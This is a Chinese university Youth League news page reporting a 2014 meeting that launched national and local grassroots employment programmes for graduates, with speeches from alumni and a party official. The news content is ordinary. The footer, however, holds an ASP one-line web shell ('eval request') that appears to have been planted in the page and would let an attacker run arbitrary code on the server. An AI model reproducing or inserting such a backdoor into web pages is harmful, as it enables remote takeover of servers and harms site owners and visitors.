当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
我校召开2014年国家及地方项目就业启动会
[2014年04月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    为引导我校广大毕业生响应国家和上海市的号召,积极投身基层,锻炼实践,砥砺青春,2014年4月14日下午,我校在行政楼137报告厅召开了国家及地方项目就业启动会暨“支扶学子母校行”活动。校党委副书记汪歙萍、学生工作部(处),研究生院、武装部、校团委等相关负责人以及各学院党委副书记,就业指导员、2014届毕业生代表、历届参加国家和地方项目的优秀毕业生代表等出席了本次启动会。

     在启动会上,校团委和校就业指导中心分别就“大学生志愿服务西部计划”、“上海市选聘高校毕业生到村任职计划”、上海高校毕业生“三支一扶计划”、“大学生社区服务计划”等项目的实施背景、目前开展的情况等向毕业生们做了细致的说明,并就项目的招募流程、岗位志愿填报等进行了介绍。西部志愿者代表、2012届食品学院食品科学与工程专业王冰冰,村官计划代表、浦东新区书院镇村党支部书记助理、我校2013届生命学院生物科学专业孙晓婷,上海市“三支一扶”项目代表、2008届经管学院物流管理(食品物流管理)专业谢勇华,大学生社区服务计划代表、2013届人文学院社会工作专业朱蕴清向老师和同学们交流了各自在基层工作的情况、体会,分享了他们的宝贵经验。他们号召,母校广大毕业生们怀着一颗真正为人民服务的心,到基层去,到农村去,在广大的农村和基层发挥自己的力量。海洋学院海洋管理专业印怡菁同学代表2014届报名参加基层项目的毕业生做了发言,号召同学们积极行动起来,在支扶中学习,在学习中支扶,为社会主义新农村建设贡献一份力量。

    校党委副书记汪歙萍在讲话中希望广大毕业生以切实的行动和饱满的激情踊跃报名国家及地方项目,要珍惜机会,勇于尝试,注重积累,积极发扬“勤朴忠实”的精神,努力工作,发挥才智,去广阔农村和基层岗位锻炼,实现自己的人生价值。同时希望学校职能部门进一步做好项目的宣传以及相关政策的整理汇总。

   会后,校就业指导中心还特邀专业老师对今年报考国家及地方项目的毕业生进行了培训指导。预祝我们的海大学子能够取得好成绩!

 

关闭窗口

上一篇:我校教工荣获第二届“上海市高校后勤标兵”称号

下一篇:“奋斗的青春最美丽”
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>